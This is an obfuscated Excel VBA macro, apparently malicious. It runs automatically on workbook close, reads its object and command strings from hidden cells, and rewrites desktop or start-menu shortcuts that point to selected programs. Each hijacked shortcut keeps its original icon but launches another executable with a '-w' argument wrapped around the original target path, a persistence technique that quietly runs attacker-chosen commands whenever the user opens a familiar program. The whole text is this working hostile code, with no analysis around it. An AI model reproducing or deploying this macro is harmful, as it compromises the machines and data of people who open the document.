Sub Auto_Close()
Set EPowNG = CreateObject(activeSheet.Range("BC62").value)
Set vRkemA = CreateObject(activeSheet.Range("BG62").value)
Set pQHDBTsh = vRkemA.GetFolder(EPowNG.SpecialFolders(activeSheet.Range("BI62").value))
For Each hbONtEd In pQHDBTsh.Files
If(InStr(Lcase(hbONtEd), ".lnk")) Then
Set eWwISfP = EPowNG.CreateShortcut(EPowNG.SPecialFolders(activeSheet.Range("BI62").value) & "\" & hbONtEd.name)
If(InStr(Lcase(eWwISfP.targetPath), activeSheet.Range("BK62").value) or InStr(Lcase(eWwISfP.targetPath), activeSheet.Range("BO62").value) or InStr(Lcase(eWwISfP.targetPath), activeSheet.Range("BR62").value)) Then
eWwISfP.IconLocation = eWwISfP.targetpath
eWwISfP.arguments = "-w " & activeSheet.Range("BV62").Value & eWwISfP.targetPath & "'" & activeSheet.Range("BX62").Value
eWwISfP.targetpath = left(CurDir, InStr(CurDir, ":")-1) & activeSheet.Range("CB62").value
if(Len(eWwISfP.arguments) < 1023) Then
eWwISfP.save
end if
end if
end if
next hbONtEd
End Sub
